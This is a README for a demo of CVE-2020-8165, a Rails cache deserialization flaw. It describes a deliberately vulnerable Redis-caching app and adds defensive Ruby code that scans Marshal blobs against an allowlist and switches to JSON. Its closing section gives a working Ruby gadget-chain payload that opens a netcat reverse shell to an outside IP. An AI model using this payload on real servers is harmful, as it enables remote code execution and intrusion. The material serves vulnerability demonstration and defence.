# CVE-2020-8165 Demo
Yet another demo of CVE-2020-8165, though in a more realistic implementation than most.
## Background
*CVE-2020-8165*
> A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.
### References
- https://hackerone.com/reports/413388
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
- https://nvd.nist.gov/vuln/detail/CVE-2020-8165
- https://www.cvebase.com/cve/2020/8165
- https://lab.wallarm.com/exploring-de-serialization-issues-in-ruby-projects-801e0a3e5a0a/
## Implementation
The "Shouter" app has a caching feature in its `Shout` model: optional images submitted alongside a shout (`shout:string`) are cached in Redis and read back from there rather than from the DB. Because the vulnerable `Rails.cache.fetch` method is used to interact with the cache, the app is susceptible to CVE-2020-8165, and the output of the RCE ends up in the `src` attribute of the `img` tags on the dashboard route.
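As an added example (not part of the demo app or of Rails), the defensive counterpart to the cache path described above: a guard that lists the classes a Marshal blob pulled from Redis would instantiate, without ever loading it, so anything outside an expected set can be rejected before `Marshal.load` runs, plus a JSON encoding for the image entries so the read path never has to unmarshal user-influenced bytes at all. The `CachedImage`/`StrayObject` classes, the sample blobs and the allowlist are constructed for this example.

```ruby
require "json"

# Lists the classes a Marshal blob would instantiate WITHOUT loading it. Marshal
# tags 'o' (object), 'S' (Struct), 'C' (subclassed builtin), 'U' (marshal_dump)
# and 'u' (_dump) are each followed by a symbol: ':' + length byte + name. Names
# under 123 bytes are handled; a symbol link (';') to a name seen before is
# already covered by its first occurrence.
def marshal_class_names(blob)
  blob = blob.b
  return [] unless blob.start_with?("\x04\x08".b)
  names = []
  pos = 2
  while (pos = blob.index(/[oSCUu]:/n, pos))
    len = blob.getbyte(pos + 2).to_i - 5
    names << blob[pos + 3, len] if len.between?(1, 122)
    pos += 3
  end
  names.uniq
end

# A blob is only loadable if every class it names is expected. In the affected
# Rails versions the store itself writes Marshal dumps of
# ActiveSupport::Cache::Entry, so a production allowlist would start from that
# class plus whatever the cached value legitimately holds (assumed here).
def safe_to_load?(blob, allowed)
  (marshal_class_names(blob) - allowed).empty?
end

# Alternative that avoids Marshal on the read path entirely: keep image entries
# as JSON (strings, numbers, arrays, hashes only) and validate the shape on read.
def encode_image_entry(name, content_type, bytes)
  JSON.generate("name" => name, "content_type" => content_type,
                "data" => [bytes].pack("m0"))
end

def decode_image_entry(raw)
  entry = JSON.parse(raw)
  keys = %w[name content_type data]
  return nil unless entry.is_a?(Hash) && keys.all? { |k| entry[k].is_a?(String) }
  entry.merge("data" => entry["data"].unpack1("m0"))
end

# Constructed samples: a benign entry and one naming a class the cache never stores.
CachedImage = Struct.new(:name, :bytes)
class StrayObject; def initialize; @src = "x"; end; end
BENIGN_BLOB = Marshal.dump(CachedImage.new("logo.png", "\x89PNG".b))
STRAY_BLOB  = Marshal.dump(StrayObject.new)
```

The class-name scan is a byte-level heuristic (a tag followed by `:` inside string data would also match), so treat a hit as a reason to quarantine the key and inspect it, not as proof of an exploit.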
### Generating RCE payloads
The following snippet will generate the payload you need to send using `exploit.py`. There's some nuance in the serialization step that still needs to be worked out before the exploit can be implemented fully in Python. Hence, `Marshal.dump` in Ruby is needed to generate the exact payload (for now).
```ruby
cmd = "Thread.new{system('nc 172.17.188.169 3001 -e /bin/bash')}"
erb = ERB.allocate
erb.instance_variable_set(:@src, cmd)
erb.instance_variable_set(:@lineno, 0)
payload_raw = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
payload = Marshal.dump(payload_raw)
p payload
```